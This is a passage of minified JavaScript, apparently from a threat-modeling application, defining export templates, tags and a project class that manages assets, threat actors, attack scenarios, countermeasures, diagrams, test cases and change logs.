d?Gn.wrap(i,c(d)):[""]})(Qg.ToString)}return Gn.wrap(i,Yo.GetValue(a,e))}static ToString(a){switch(a){case $r.Number:return"general.Number";case $r.Status:return"properties.Status";case $r.Version:return"properties.Version";case $r.PreConditions:return"properties.PreConditions";case $r.Steps:return"properties.Steps";case $r.TestData:return"properties.TestData";case $r.Summary:return"properties.Summary";default:return console.error("Missing Prop in ExportTestCasePropertyUtil.ToString()"),"Undefined"}}}var Qo=(()=>{return(t=Qo||(Qo={})).AttackScenario="AttackScenario",t.Countermeasure="Countermeasure",t.MitigationProcess="MitigationProcess",t.SystemThreat="SystemThreat",t.ThreatSources="ThreatSources",t.TestCase="TestCase",Qo;var t})();class DT{static GetKeys(a=null){return a?a==jo.AttackScenarios?[Qo.AttackScenario]:a==jo.Countermeasures?[Qo.Countermeasure]:a==jo.MitigationProcesses?[Qo.MitigationProcess]:a==jo.SystemThreats?[Qo.SystemThreat]:a==jo.ThreatSources?[Qo.ThreatSources]:a==jo.TestCases?[Qo.TestCase]:void 0:[Qo.AttackScenario,Qo.Countermeasure,Qo.SystemThreat]}static GetProperties(a){return a==Qo.AttackScenario?[...Yo.GetKeys(),...bT.GetKeys()]:a==Qo.Countermeasure?[...Yo.GetKeys(),...MT.GetKeys()]:a==Qo.MitigationProcess?[...Yo.GetKeys(),...vT.GetKeys()]:a==Qo.SystemThreat?[...Yo.GetKeys(),...AT.GetKeys()]:a==Qo.ThreatSources?[...Yo.GetKeys(),...TT.GetKeys()]:a==Qo.TestCase?[...Yo.GetKeys(),...ET.GetKeys()]:[]}static GetValues(a,e,i){const n=a.split(".");switch(n[0]){case Qo.AttackScenario:return bT.GetValues(n[1],e,i);case Qo.Countermeasure:return MT.GetValues(n[1],e,i);case Qo.MitigationProcess:return vT.GetValues(n[1],e,i);case Qo.SystemThreat:return AT.GetValues(n[1],e,i);case Qo.ThreatSources:return TT.GetValues(n[1],e,i);case Qo.TestCase:return ET.GetValues(n[1],e,i);default:return[""]}}static ToString(a){switch(a){case Qo.AttackScenario:return"exportclasses.AttackScenario";case Qo.Countermeasure:return"exportclasses.Countermeasure";case Qo.MitigationProcess:return"exportclasses.MitigationProcess";case Qo.SystemThreat:return"exportclasses.SystemThreat";case Qo.ThreatSources:return"exportclasses.ThreatSource";case Qo.TestCase:return"exportclasses.TestCase";default:return console.error("Missing Export Class in ExportClassUtil.ToString()"),"Undefined"}}}class xT extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.ExportType||(this.ExportType=jo.AttackScenarios),null==this.ExportFilter&&(this.ExportFilter=Ol.Applicable)}get ExportType(){return this.Data.ExportType}set ExportType(a){this.Data.ExportType=a}get ExportFilter(){return this.Data.ExportFilter}set ExportFilter(a){this.Data.ExportFilter=a}get HasExportFilter(){return[jo.AttackScenarios,jo.Countermeasures].includes(this.ExportType)}get Template(){return this.Data.Template}set Template(a){this.Data.Template=a}GetRowData(a){const e=[];let i;return this.ExportType==jo.AttackScenarios?i=this.ExportFilter==Ol.Applicable?this.project.GetAttackScenariosApplicable():this.ExportFilter==Ol.NotApplicable?this.project.GetAttackScenariosNotApplicable():this.project.GetAttackScenarios():this.ExportType==jo.Countermeasures?i=this.ExportFilter==Ol.Applicable?this.project.GetCountermeasuresApplicable():this.ExportFilter==Ol.NotApplicable?this.project.GetCountermeasuresNotApplicable():this.project.GetCountermeasures():this.ExportType==jo.MitigationProcesses?i=this.project.GetMitigationProcesses():this.ExportType==jo.SystemThreats?i=this.project.GetSystemThreats():this.ExportType==jo.ThreatSources?i=this.project.GetThreatSources().Sources:this.ExportType==jo.TestCases&&(i=this.project.GetTesting().TestCases),i.sort((n,r)=>Number(n.Number)-Number(r.Number)),i.forEach(n=>{var r,c,d;let T=[];const k=[];for(let q=0;q=1?(null===(r=Y[0])||void 0===r?void 0:r.length)>0?T.push(a.instant(Y[0])):T.push(Y[0]):T.push(""),Y.length>1){k[q]=[];for(let te=1;te0?k[q].push(a.instant(Y[te])):k[q].push(Y[te])}}if(e.push(T),k.length>0){const q=Math.max(...k.map(Y=>null==Y?void 0:Y.length).filter(Y=>Y));for(let Y=0;YY?T.push(k[te][Y]):T.push("");e.push(T)}}}),e}FindReferences(a,e){return[]}OnDelete(a,e){}static FromJSON(a,e,i){return new xT(a,e,i)}}var ad=(()=>{return(t=ad||(ad={}))[t.Severity=1]="Severity",t[t.Risk=2]="Risk",t[t.Countermeasure=3]="Countermeasure",ad;var t})();class NG{static GetKeys(){return[ad.Severity,ad.Risk,ad.Countermeasure]}static ToString(a){switch(a){case ad.Severity:return"properties.tagcharttype.Severity";case ad.Risk:return"properties.tagcharttype.Risk";case ad.Countermeasure:return"properties.tagcharttype.Countermeasure";default:return console.error("Missing State in TagChartTypeUtil.ToString()",a),"Undefined"}}}class pM extends Ln{constructor(a,e,i){super(a),this.project=e,this.Color||(this.Color="#2196f3")}get Color(){return this.Data.Color}set Color(a){this.Data.Color=a}get ColorPicker(){var a;if((null===(a=this.colorPicker)||void 0===a?void 0:a.toHexString())!=this.Color){let e=this.Color.replace("#","").match(/.{1,2}/g),i=[parseInt(e[0],16),parseInt(e[1],16),parseInt(e[2],16)];this.colorPicker=new kp(i[0],i[1],i[2])}return this.colorPicker}set ColorPicker(a){this.Color=a.toHexString()}FindReferences(a,e){let i=[];return null==a||a.GetAttackScenarios().filter(n=>n.MyTags.includes(this)).forEach(n=>i.push({Type:li.RemoveMyTagFromAttackScenario,Param:n})),null==a||a.GetCountermeasures().filter(n=>n.MyTags.includes(this)).forEach(n=>i.push({Type:li.RemoveMyTagFromCountermeasure,Param:n})),null==a||a.GetMyTagCharts().filter(n=>n.MyTags.includes(this)).forEach(n=>i.push({Type:li.RemoveMyTagFromMyTagChart,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{(n.Type==li.RemoveMyTagFromAttackScenario||n.Type==li.RemoveMyTagFromCountermeasure||n.Type==li.RemoveMyTagFromMyTagChart)&&n.Param.RemoveMyTag(this.ID)})}static FromJSON(a,e,i){return new pM(a,e,i)}}class wT extends Ln{constructor(a,e,i){super(a),this.project=e,this.Data.myTagIDs||(this.Data.myTagIDs=[]),this.Type||(this.Type=ad.Severity)}get MyTags(){let a=[];return this.Data.myTagIDs.forEach(e=>a.push(this.project.GetMyTag(e))),a}set MyTags(a){this.Data.myTagIDs=null==a?void 0:a.map(e=>e.ID)}get Type(){return this.Data.Type}set Type(a){this.Data.Type=a}AddMyTag(a){this.MyTags.includes(a)||this.Data.myTagIDs.push(a.ID)}RemoveMyTag(a){const e=this.Data.myTagIDs.indexOf(a);e>=0&&this.Data.myTagIDs.splice(e,1)}FindReferences(a,e){return[]}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{})}static FromJSON(a,e,i){return new wT(a,e,i)}}class mf extends Ln{constructor(a,e){if(super(a),this.fileChanged=!1,this.changeLog=[],this.assetGroups=[],this.myData=[],this.threatActors=[],this.systemThreats=[],this.contextElementMap=new Map,this.dfdElementMap=new Map,this.diagrams=[],this.stacks=[],this.componentMap=new Map,this.attackScenarioMap=new Map,this.countermeasureMap=new Map,this.mitigationProcesses=[],this.checklists=[],this.testCases=[],this.myTags=[],this.myTagCharts=[],this.exportTemplates=[],this.AssetsChanged=new Tt,this.MyDatasChanged=new Tt,this.DevicesChanged=new Tt,this.MobileAppsChanged=new Tt,this.ContextElementsChanged=new Tt,this.DFDElementsChanged=new Tt,this.MyComponentsChanged=new Tt,this.DiagramsChanged=new Tt,this.ThreatActorsChanged=new Tt,this.SystemThreatsChanged=new Tt,this.AttackScenariosChanged=new Tt,this.CountermeasuresChanged=new Tt,this.MitigationProcessesChanged=new Tt,this.TestCasesChanged=new Tt,this.deepDiffMapper={KEY_CHANGETYP:"cT",KEY_OLDDATA:"oD",KEY_NEWDATA:"nD",map:function(n,r){if(this.isFunction(n)||this.isFunction(r))throw"Invalid argument. Function given, object expected.";if(this.isValue(n)||this.isValue(r))return{cT:this.compareValues(n,r),oD:n,nD:r};var c={};for(var d in n)if(!this.isFunction(n[d])){var T=void 0;void 0!==r[d]&&(T=r[d]),c[d]=this.map(n[d],T)}for(var d in r)this.isFunction(r[d])||void 0!==c[d]||(c[d]=this.map(void 0,r[d]));return c},compareValues:function(n,r){return n===r||this.isDate(n)&&this.isDate(r)&&n.getTime()===r.getTime()?0:void 0===n?Ja.Added:void 0===r?Ja.Removed:Ja.Changed},isFunction:function(n){return"[object Function]"===Object.prototype.toString.call(n)},isArray:function(n){return"[object Array]"===Object.prototype.toString.call(n)},isDate:function(n){return"[object Date]"===Object.prototype.toString.call(n)},isObject:function(n){return"[object Object]"===Object.prototype.toString.call(n)},isValue:function(n){return!this.isObject(n)&&!this.isArray(n)}},this.Data.Name||(this.Data.Name="New Project"),this.Data.Version||(this.Data.Version=D5.ProjectVersion),this.Data.ProgressTracker||(this.Data.ProgressTracker={}),this.Data.Participants||(this.Data.Participants=[]),this.Data.Tasks||(this.Data.Tasks=[]),this.Data.Notes||(this.Data.Notes=[]),this.Data.Settings||(this.Data.Settings={ThreatActorToAttackScenario:!0}),this.config=e,!this.projectAssetGroupId){let n=this.InitializeNewAssetGroup(e);this.Data.projectAssetGroupId=n.ID}const i=(n,r,c,d,T)=>{if(this.projectCopy&&this.changeLog.findIndex(k=>k.ID==n.ID&&k.Type==n.Type)<0&&!this.changeLog.some(k=>k.ID==n.ID&&k.Type>n.Type))if(n.Type==Ja.Removed){const k=this.changeLog.find(Y=>Y.ID==n.ID);let q=null;if(k)q=k.Name;else{const Y=this.projectCopy[r].find(te=>te.ID==n.ID);if(Y){const te=c.FromJSON(Y,this,this.Config);q=te&&te.GetLongName?te.GetLongName():Y.Name}}q?this.changeLog.push({Title:T,Name:q,ID:n.ID,Type:n.Type}):console.error("Missing object")}else{const k=this[d](n.ID);if(k){let q=k.Name;k.GetLongName&&(q=k.GetLongName()),this.changeLog.push({Title:T,Name:q,ID:n.ID,Type:n.Type})}}};this.AssetsChanged.subscribe(n=>setTimeout(()=>{i(n,"assetGroups",Zl,"GetAssetGroup","general.Asset")},200)),this.DiagramsChanged.subscribe(n=>setTimeout(()=>{i(n,"diagrams",ns,"GetDiagram","general.Diagram")},200)),this.ContextElementsChanged.subscribe(n=>setTimeout(()=>{i(n,"contextElements",os,"GetContextElement","general.Element")},200)),this.DFDElementsChanged.subscribe(n=>setTimeout(()=>{i(n,"dfdElements",lc,"GetDFDElement","general.Element")},200)),this.MyComponentsChanged.subscribe(n=>setTimeout(()=>{i(n,"components",rf,"GetComponent","general.Component")},200)),this.SystemThreatsChanged.subscribe(n=>setTimeout(()=>{i(n,"systemThreats",hM,"GetSystemThreat","general.SystemThreat")},200)),this.ThreatActorsChanged.subscribe(n=>setTimeout(()=>{i(n,"threatActors",Gp,"GetThreatActor","general.ThreatActor")},200)),this.AttackScenariosChanged.subscribe(n=>setTimeout(()=>{i(n,"attackScenarios",Rc,"GetAttackScenario","general.AttackScenario")},200)),this.CountermeasuresChanged.subscribe(n=>setTimeout(()=>{i(n,"countermeasures",Jl,"GetCountermeasure","general.Countermeasure")},200)),this.MitigationProcessesChanged.subscribe(n=>setTimeout(()=>{i(n,"mitigationProcesses",Lp,"GetMitigationProcess","general.MitigationProcess")},200)),this.TestCasesChanged.subscribe(n=>setTimeout(()=>{i(n,"testCases",$g,"GetTestCase","general.TestCase")},200))}get projectAssetGroupId(){return this.Data.projectAssetGroupId}get Version(){return this.Data.Version}get TTModelerVersion(){return this.Data.TTModelerVersion}set TTModelerVersion(a){this.Data.TTModelerVersion=a}get ProgressTracker(){return this.Data.ProgressTracker}get ProgressStep(){return this.Data.ProgressStep}set ProgressStep(a){this.Data.ProgressStep=a}get FileChanged(){return this.fileChanged||this.Config.FileChanged}set FileChanged(a){this.fileChanged=a,a?this.DataChanged.emit():(this.changeLog=[],this.projectCopy=JSON.parse(JSON.stringify(this.ToJSON())))}get UserVersion(){return this.Data.UserVersion}set UserVersion(a){this.Data.UserVersion=a}get Participants(){return this.Data.Participants}set Participants(a){this.Data.Participants=a}get Tasks(){return this.Data.Tasks}set Tasks(a){this.Data.Tasks=a}get Notes(){return this.Data.Notes}set Notes(a){this.Data.Notes=a}get Image(){return this.Data.Image}set Image(a){this.Data.Image=a}get Settings(){return this.Data.Settings}GetProjectName(){return Gi.FromCamelCase(this.Name.replace(".ttmp",""))}GetCharScope(){return this.charScope}GetObjImpact(){return this.objImpact}GetSysContext(){return this.sysContext}GetAssetGroups(){return this.assetGroups}GetProjectAssetGroup(){return this.GetAssetGroups().find(a=>a.ID==this.projectAssetGroupId)}GetMyDatas(){return this.myData}GetThreatActors(){return this.threatActors}GetThreatSources(){return this.threatSources}GetSystemThreats(){return this.systemThreats}GetContextElements(){return Array.from(this.contextElementMap,([a,e])=>e)}GetDFDElements(){return Array.from(this.dfdElementMap,([a,e])=>e)}GetDiagrams(){return this.diagrams}GetHWDFDiagrams(){return this.GetDiagrams().filter(a=>[xn.Hardware,xn.DataFlow].includes(a.DiagramType))}GetHWDiagrams(){return this.diagrams.filter(a=>a.DiagramType==xn.Hardware)}GetDFDiagrams(){return this.diagrams.filter(a=>a.DiagramType==xn.DataFlow)}GetStacks(){return this.stacks}GetDevices(){return this.GetContextElements().filter(a=>a.Type==Aa.Device&&a instanceof Ou)}GetMobileApps(){return this.GetContextElements().filter(a=>a.Type==Aa.MobileApp&&a instanceof cf)}GetComponents(){return Array.from(this.componentMap,([a,e])=>e)}GetAttackScenarios(){return Array.from(this.attackScenarioMap,([a,e])=>e)}GetAttackScenariosApplicable(){return this.GetAttackScenarios().filter(a=>![_o.NotApplicable,_o.Duplicate].includes(a.ThreatState))}GetAttackScenariosNotApplicable(){return this.GetAttackScenarios().filter(a=>[_o.NotApplicable,_o.Duplicate].includes(a.ThreatState))}GetCountermeasures(){return Array.from(this.countermeasureMap,([a,e])=>e)}GetCountermeasuresApplicable(){return this.GetCountermeasures().filter(a=>![Ra.NotApplicable,Ra.Rejected,Ra.Duplicate].includes(a.MitigationState))}GetCountermeasuresNotApplicable(){return this.GetCountermeasures().filter(a=>[Ra.NotApplicable,Ra.Rejected,Ra.Duplicate].includes(a.MitigationState))}GetMitigationProcesses(){return this.mitigationProcesses}GetChecklists(){return this.checklists}GetTestCases(){return this.testCases}GetTesting(){return this.testing}get HasTesting(){return null!=this.testing}GetMyTags(){return this.myTags}GetMyTagCharts(){return this.myTagCharts}GetExportTemplates(){return this.exportTemplates}get Config(){return this.config}InitializeNewProject(){this.charScope=new dM({},this,this.config),this.objImpact=new mM({},this,this.config),this.sysContext=new pT({},this,this.config),this.threatSources=new uM({},this,this.config)}GetLog(){if(this.projectCopy){const a=this.ToJSON(),i=this.deepDiffMapper.map(this.projectCopy,a),n=c=>{Object.keys(c).forEach(d=>{const T=c[d];"object"==typeof T&&!Array.isArray(T)&&null!==T&&(0==Object.keys(T).length||this.deepDiffMapper.KEY_CHANGETYP in T&&0===T[this.deepDiffMapper.KEY_CHANGETYP]?delete c[d]:n(T),0==Object.keys(T).length&&delete c[d])})};n(i);const r=[];return Object.keys(i).forEach(c=>{"Data"===c?Object.keys(i[c]).forEach(d=>{r.push({ID:null,Title:d,Type:Ja.Changed})}):"config"===c?r.push({ID:null,Title:"side-nav.configuration",Type:Ja.Changed}):"charSope"===c?r.push({ID:null,Title:"dialog.transferproject.d.CharScope",Type:Ja.Changed}):"objImpact"===c?r.push({ID:null,Title:"dialog.transferproject.d.ObjImpact",Type:Ja.Changed}):"tagCharts"===c?r.push({ID:null,Title:"dialog.tagcharts.title",Type:Ja.Changed}):"exportTemplates"===c&&r.push({ID:null,Title:"pages.reporting.Templates",Type:Ja.Changed})}),[...this.changeLog,...r]}return[]}CreateDevice(){let a=os.Instantiate(Aa.Device,this,this.Config);return this.AddContextElement(a),this.DevicesChanged.emit({ID:a.ID,Type:Ja.Added}),a}CreateMobileApp(){let a=os.Instantiate(Aa.MobileApp,this,this.Config);return this.AddContextElement(a),this.MobileAppsChanged.emit({ID:a.ID,Type:Ja.Added}),a}AddContextElement(a){return!this.contextElementMap.has(a.ID)&&(this.contextElementMap.set(a.ID,a),!0)}DeleteContextElement(a){return!!this.contextElementMap.has(a.ID)&&(a.OnDelete(this,this.config),this.contextElementMap.delete(a.ID),this.ContextElementsChanged.emit({ID:a.ID,Type:Ja.Removed}),a instanceof Ou&&this.DevicesChanged.emit({ID:a.ID,Type:Ja.Removed}),a instanceof cf&&this.MobileAppsChanged.emit({ID:a.ID,Type:Ja.Removed}),!0)}GetContextElement(a){return this.contextElementMap.get(a)}GetContextElementRefs(){return this.GetContextElements().filter(a=>a instanceof Ts||a instanceof Bg)}MoveItemInContextElements(a,e){this.moveItemInMap("contextElementMap",a,e)}GetAssetGroup(a){return this.assetGroups.find(e=>e.ID==a)}CreateAssetGroup(a){let e=new Zl({},this,this.Config);return this.assetGroups.push(e),e.Name=Gi.FindUniqueName("Asset Group",this.assetGroups.map(i=>i.Name)),null!=a&&a.AddAssetGroup(e),e.Number=0==this.GetNewAssets().length?"1":(Math.max(...this.GetNewAssets().map(i=>Number(i.Number)).filter(i=>!isNaN(i)))+1).toString(),e.IsNewAsset=!0,this.AssetsChanged.emit({ID:e.ID,Type:Ja.Added}),e}DeleteAssetGroup(a){const e=this.assetGroups.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.assetGroups.splice(e,1),this.AssetsChanged.emit({ID:a.ID,Type:Ja.Removed})),e>=0}InitializeNewAssetGroup(a){let e=(n,r)=>{let c=this.CreateMyData(r);return c.CopyFrom(n.Data),c.IsNewAsset=!1,c.Number=null,c},i=(n,r)=>{let c=this.CreateAssetGroup(r);return c.CopyFrom(n.Data),c.IsNewAsset=!1,c.Number=null,c.Data.assetGroupIDs=[],n.SubGroups.forEach(d=>{let T=i(d,c);c.AddAssetGroup(T)}),c.Data.associatedDataIDs=[],n.AssociatedData.forEach(d=>{let T=e(d,c);c.AddMyData(T)}),c};return i(a.AssetGroups,null)}GetMyData(a){return this.myData.find(e=>e.ID==a)}CreateMyData(a){let e=new Pu({},this,this.Config);return a&&a.AddMyData(e),this.myData.push(e),e.Name=Gi.FindUniqueName("Data",this.GetMyDatas().map(i=>i.Name)),e.Number=0==this.GetNewAssets().length?"1":(Math.max(...this.GetNewAssets().map(i=>Number(i.Number)).filter(i=>!isNaN(i)))+1).toString(),e.IsNewAsset=!0,this.MyDatasChanged.emit({ID:e.ID,Type:Ja.Added}),e}DeleteMyData(a){const e=this.myData.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.myData.splice(e,1),this.MyDatasChanged.emit({ID:a.ID,Type:Ja.Removed})),e>=0}GetNewAssets(){return[...this.GetAssetGroups(),...this.GetMyDatas()].filter(a=>a.IsNewAsset)}GetThreatActor(a){return this.threatActors.find(e=>e.ID==a)}CreateThreatActor(){const a=new Gp({},this,this.Config);return a.Name=Gi.FindUniqueName("Threat Actor",this.threatActors.map(e=>e.Name)),a.Likelihood=dr.Medium,a.Number=0==this.GetThreatActors().length?"1":(Math.max(...this.GetThreatActors().map(e=>Number(e.Number)))+1).toString(),this.threatActors.push(a),this.ThreatActorsChanged.emit({ID:a.ID,Type:Ja.Added}),a}DeleteThreatActor(a){const e=this.threatActors.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.threatActors.splice(e,1),this.ThreatActorsChanged.emit({ID:a.ID,Type:Ja.Removed})),e>=0}GetSystemThreat(a){return this.systemThreats.find(e=>e.ID==a)}CreateSystemThreat(a){let e=new hM({},this,this.Config);return e.Name=Gi.FindUniqueName(a?a.Name:"Threat",this.GetSystemThreats().map(i=>i.Name)),e.ThreatCategory=a,e.Number=0==this.GetSystemThreats().length?"1":(Math.max(...this.GetSystemThreats().map(i=>Number(i.Number)))+1).toString(),this.systemThreats.push(e),this.SystemThreatsChanged.emit({ID:e.ID,Type:Ja.Added}),e}DeleteSystemThreat(a){const e=this.systemThreats.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.systemThreats.splice(e,1),this.SystemThreatsChanged.emit({ID:a.ID,Type:Ja.Removed})),e>=0}AddDFDElement(a){return!this.dfdElementMap.has(a.ID)&&(this.dfdElementMap.set(a.ID,a),this.DFDElementsChanged.emit({ID:a.ID,Type:Ja.Added}),!0)}DeleteDDFElement(a){return!!this.dfdElementMap.has(a.ID)&&(a.OnDelete(this,this.config),this.dfdElementMap.delete(a.ID),this.DFDElementsChanged.emit({ID:a.ID,Type:Ja.Removed}),!0)}GetDFDElement(a){return this.dfdElementMap.get(a)}GetDFDElementRefs(){return this.GetDFDElements().filter(a=>a instanceof td||a instanceof zm)}FindDeviceOfDiagram(a){return this.GetDevices().find(e=>e.HardwareDiagram.ID==a.ID)}CreateDiagram(a){let e;a==xn.Hardware||a==xn.DataFlow?e=new Vg({},this,this.Config):(a==xn.Context||a==xn.UseCase)&&(e=new b2({},this,this.Config)),e.DiagramType=a;let i="Context";return a==xn.UseCase?i="Use Case":a==xn.Hardware?i="Hardware":a==xn.DataFlow&&(i="Data Flow"),e.Name=Gi.FindUniqueName(i+" Diagram",this.diagrams.filter(n=>n.DiagramType==a).map(n=>n.Name)),this.diagrams.push(e),this.DiagramsChanged.emit({ID:e.ID,Type:Ja.Added}),e}GetDiagram(a){return this.diagrams.find(e=>e.ID==a)}DeleteDiagram(a){const e=this.diagrams.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.diagrams.splice(e,1),this.DiagramsChanged.emit({ID:a.ID,Type:Ja.Removed})),e>=0}FindDiagramOfElement(a){return this.GetDiagrams().find(e=>{var i;return null===(i=e.Elements)||void 0===i?void 0:i.GetChildrenFlat().some(n=>n.ID==a)})}AddComponent(a){return!this.componentMap.has(a.ID)&&(this.componentMap.set(a.ID,a),!0)}GetComponent(a){return this.componentMap.get(a)}CreateComponent(a){let e=new rf({},a,this,this.Config);return this.componentMap.set(e.ID,e),this.MyComponentsChanged.emit({ID:e.ID,Type:Ja.Added}),e}DeleteComponent(a){return!!this.componentMap.has(a.ID)&&(a.OnDelete(this,this.config),this.componentMap.delete(a.ID),this.AssetsChanged.emit({ID:a.ID,Type:Ja.Removed}),!0)}GetStack(a){return this.stacks.find(e=>e.ID==a)}CreateStack(a){let e=new Om({},this,this.Config);return e.ComponentTypeID=a,this.stacks.push(e),e}DeleteStack(a){const e=this.stacks.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.stacks.splice(e,1)),e>=0}GetAttackScenario(a){return this.attackScenarioMap.get(a)}CreateAttackScenario(a,e){let i=new Rc({},this,this.Config);return i.IsGenerated=e,i.Number=0==this.GetAttackScenarios().length?"1":(Math.max(...this.GetAttackScenarios().map(n=>Number(n.Number)))+1).toString(),i.ViewID=a,this.attackScenarioMap.set(i.ID,i),this.AttackScenariosChanged.emit({ID:i.ID,Type:Ja.Added}),i}DeleteAttackScenario(a){return!!this.attackScenarioMap.has(a.ID)&&(a.OnDelete(this,this.config),this.attackScenarioMap.delete(a.ID),this.AttackScenariosChanged.emit({ID:a.ID,Type:Ja.Removed}),!0)}CleanUpGeneratedAttackScenarios(){this.attackScenarioMap.forEach(a=>{a.IsGenerated&&this.attackScenarioMap.delete(a.ID)})}MoveItemAttackScenario(a,e){this.moveItemInMap("attackScenarioMap",a,e)}GetCountermeasure(a){return this.countermeasureMap.get(a)}CreateCountermeasure(a,e){let i=new Jl({},this,this.Config);return i.IsGenerated=e,i.Number=0==this.GetCountermeasures().length?"1":(Math.max(...this.GetCountermeasures().map(n=>Number(n.Number)))+1).toString(),i.ViewID=a,this.countermeasureMap.set(i.ID,i),this.CountermeasuresChanged.emit({ID:i.ID,Type:Ja.Added}),i}DeleteCountermeasure(a){return!!this.countermeasureMap.has(a.ID)&&(a.OnDelete(this,this.config),this.countermeasureMap.delete(a.ID),this.CountermeasuresChanged.emit({ID:a.ID,Type:Ja.Removed}),!0)}MoveItemCountermeasures(a,e){this.moveItemInMap("countermeasureMap",a,e)}GetMitigationProcess(a){return this.mitigationProcesses.find(e=>e.ID==a)}CreateMitigationProcess(){let a=new Lp({},this,this.Config);return a.Number=0==this.mitigationProcesses.length?"1":(Math.max(...this.mitigationProcesses.map(e=>Number(e.Number)))+1).toString(),this.mitigationProcesses.push(a),a.Name=Gi.FindUniqueName("Mitigation Process",this.GetMitigationProcesses().map(e=>e.Name)),this.MitigationProcessesChanged.emit({ID:a.ID,Type:Ja.Added}),a}DeleteMitigationProcess(a){const e=this.mitigationProcesses.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.mitigationProcesses.splice(e,1),this.MitigationProcessesChanged.emit({ID:a.ID,Type:Ja.Removed})),e>=0}GetChecklist(a){return this.checklists.find(e=>e.ID==a)}CreateChecklist(a,e){let i=new CM({},e,this,this.Config);return i.Name=e.Name,i.Description=e.Description,a.AddChecklist(i),this.checklists.push(i),i}DeleteChecklist(a){const e=this.checklists.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.checklists.splice(e,1)),e>=0}GetTestCase(a){return this.testCases.find(e=>e.ID==a)}CreateTestCase(){const a=new $g({},this,this.Config);return a.Name=Gi.FindUniqueName("Test Case",this.testCases.map(e=>e.Name)),a.Number=0==this.GetTestCases().length?"1":(Math.max(...this.GetTestCases().map(e=>Number(e.Number)))+1).toString(),this.testCases.push(a),this.testing.AddTestCase(a),this.TestCasesChanged.emit({Type:Ja.Added,ID:a.ID}),a}DeleteTestCase(a){const e=this.testCases.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.testCases.splice(e,1),this.TestCasesChanged.emit({Type:Ja.Removed,ID:a.ID})),e>=0}CreateTesting(){this.testing||(this.testing=new fM({},this,this.config))}DeleteTesting(){this.testing&&(this.testing.OnDelete(this,this.config),this.testing=null)}GetExportTemplate(a){return this.exportTemplates.find(e=>e.ID==a)}CreateExportTemplate(){let a=new xT({},this,this.Config);return a.Name=Gi.FindUniqueName("Export Template",this.GetExportTemplates().map(e=>e.Name)),this.exportTemplates.push(a),a}DeleteExportTemplate(a){const e=this.exportTemplates.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.exportTemplates.splice(e,1)),e>=0}GetMyTag(a){return this.myTags.find(e=>e.ID==a)}CreateMyTag(){let a=new pM({},this,this.Config);return a.Name=Gi.FindUniqueName("Tag",this.GetMyTags().map(e=>e.Name)),this.myTags.push(a),a}DeleteMyTag(a){const e=this.myTags.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.myTags.splice(e,1)),e>=0}GetMyTagChart(a){return this.myTagCharts.find(e=>e.ID==a)}CreateMyTagChart(){let a=new wT({},this,this.Config);return a.Name=Gi.FindUniqueName("Tag Chart",this.GetMyTagCharts().map(e=>e.Name)),this.myTagCharts.push(a),a}DeleteMyTagChart(a){const e=this.myTagCharts.indexOf(a);return e>=0&&(a.OnDelete(this,this.config),this.myTagCharts.splice(e,1)),e>=0}GetView(a){let e=this.GetDiagram(a);return e||(e=this.GetStack(a)),e}ConsistencyCheck(a){let e=[];const i=(r,c)=>{let d=[];r.forEach(T=>{var k,q;T.Number?d.includes(T.Number)?e.push(Gi.Format(a.instant("messages.error.inconsistency.project."+c+"multiNumber"),null===(q=T.GetDiagram())||void 0===q?void 0:q.Name,T.Number)):d.push(T.Number):e.push(Gi.Format(a.instant("messages.error.inconsistency.project."+c+"woNumber"),null===(k=T.GetDiagram())||void 0===k?void 0:k.Name,T.Name))})},n=(r,c)=>{let d=[];r.forEach(T=>{T.Number?d.includes(T.Number)?e.push(Gi.Format(a.instant("messages.error.inconsistency.project."+c+"multiNumber"),T.Number)):d.push(T.Number):e.push(Gi.Format(a.instant("messages.error.inconsistency.project."+c+"woNumber"),T.Name))})};return i(this.GetAttackScenarios(),"AS"),i(this.GetCountermeasures(),"CM"),n(this.GetMitigationProcesses(),"MP"),n(this.GetThreatActors(),"TS"),n(this.GetSystemThreats(),"ST"),n(this.GetTestCases(),"TC"),n(this.GetNewAssets(),"A"),e}moveItemInMap(a,e,i){let r=Array.from(this[a].entries());r.splice(i,0,r.splice(e,1)[0]),this[a]=new Map(r)}FindReferences(a,e){return null}OnDelete(a,e){}ToJSON(){var a;let e={Data:this.Data,charSope:this.charScope.ToJSON(),objImpact:this.objImpact.ToJSON(),sysContext:this.sysContext.ToJSON(),assetGroups:[],myData:[],threatActors:[],threatSources:this.threatSources.ToJSON(),systemThreats:[],contextElements:[],dfdElements:[],diagrams:[],stacks:[],components:[],attackScenarios:[],countermeasures:[],mitigationProcesses:[],checklists:[],testCases:[],testing:null===(a=this.testing)||void 0===a?void 0:a.ToJSON(),tags:[],tagCharts:[],exportTemplates:[],config:this.Config.ToJSON()};return this.assetGroups.forEach(i=>e.assetGroups.push(i.ToJSON())),this.myData.forEach(i=>e.myData.push(i.ToJSON())),this.threatActors.forEach(i=>e.threatActors.push(i.ToJSON())),this.systemThreats.forEach(i=>e.systemThreats.push(i.ToJSON())),this.contextElementMap.forEach(i=>e.contextElements.push(i.ToJSON())),this.dfdElementMap.forEach(i=>e.dfdElements.push(i.ToJSON())),this.diagrams.forEach(i=>e.diagrams.push(i.ToJSON())),this.stacks.forEach(i=>e.stacks.push(i.ToJSON())),this.componentMap.forEach(i=>e.components.push(i.ToJSON())),this.attackScenarioMap.forEach(i=>e.attackScenarios.push(i.ToJSON())),this.countermeasureMap.forEach(i=>e.countermeasures.push(i.ToJSON())),this.mitigationProcesses.forEach(i=>e.mitigationProcesses.push(i.ToJSON())),this.checklists.forEach(i=>e.checklists.push(i.ToJSON())),this.testCases.forEach(i=>e.testCases.push(i.ToJSON())),this.myTags.forEach(i=>e.tags.push(i.ToJSON())),this.myTagCharts.forEach(i=>e.tagCharts.push(i.ToJSON())),this.exportTemplates.forEach(i=>e.exportTemplates.push(i.ToJSON())),e}s